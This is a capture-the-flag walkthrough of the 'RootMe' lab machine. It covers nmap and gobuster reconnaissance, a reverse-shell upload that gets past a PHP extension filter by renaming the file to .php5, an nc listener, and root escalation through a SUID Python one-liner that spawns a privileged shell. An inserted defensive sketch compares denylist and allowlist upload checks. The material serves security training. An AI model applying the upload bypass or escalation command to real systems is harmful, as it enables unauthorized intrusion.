RootMe

Penetration Testing Methodology

Reconnaissance

  • nmap

Enumeration

  • Directory enumeration using gobuster

Exploitation *

Privilege Escalation

  • /usr/bin/python

Capturing the flag

  • user.txt

  • root.txt


Walkthrough

nmap -sC -sV 10.10.231.227

From the nmap scan, I found that 2 ports are open:

  • 22 (ssh)

  • 80 (http)

I browsed to the given IP address.

But there is nothing interesting, so I decided to enumerate the directories using gobuster.

gobuster dir -u 10.10.231.227 -w /root/List/directory-list-2.3-medium.txt

This lists all directories and files.

Open the directory (http://10.10.231.227/p****/)

Seems like we can upload a file.

Upload a reverse shell and run a listener

nc -nlvp 1234

Cannot upload a PHP file. Let's try changing the extension to php5 or php4.

Okay, success.

Click it and we will get into the system.
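
The upload form above refused a .php file but accepted the same file renamed to .php5, which is how an extension denylist typically fails. The sketch below is an added example, not code from the room or from this walkthrough: it puts a denylist check beside an allowlist check, and the function names, both extension sets and the sample file names are assumptions constructed for illustration.

```python
import os

# Hypothetical denylist resembling the behaviour seen above: ".php" is refused,
# but other extensions the server may still execute as PHP are not listed.
DENYLIST = {".php"}

# Assumed allowlist for an image-upload feature (constructed for this example).
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif"}


def denylist_accepts(filename: str) -> bool:
    """Weak check: reject only extensions that are explicitly listed."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in DENYLIST


def allowlist_accepts(filename: str) -> bool:
    """Stricter check: accept only known-safe extensions on a clean base name."""
    name = os.path.basename(filename.replace("\\", "/"))
    if name != filename or name.startswith(".") or "\x00" in name:
        return False  # path components, dotfiles such as .htaccess, NUL bytes
    stem, ext = os.path.splitext(name)
    if "." in stem:
        return False  # double extensions such as shell.php.jpg
    return ext.lower() in ALLOWLIST


# Constructed sample upload names.
SAMPLES = ["shell.php", "shell.php5", "shell.php4", "shell.php.jpg",
           ".htaccess", "photo.JPG", "../photo.png"]


def compare(names=SAMPLES):
    """Return {name: (denylist_result, allowlist_result)} for each name."""
    return {n: (denylist_accepts(n), allowlist_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, (weak, strict) in compare().items():
        print(f"{name:15} denylist={weak!s:5} allowlist={strict}")
```

An extension check is only one layer: uploads should also be stored under a server-generated name in a directory where the web server does not execute scripts.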

find / -name user.txt 2>/dev/null

Privilege Escalation

/usr/bin/python

python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

CONGRATULATIONS!!

This was a fun machine. Very basic yet fun to root. Good for beginners.

Thank you for reading. :)

By AdaniKamal
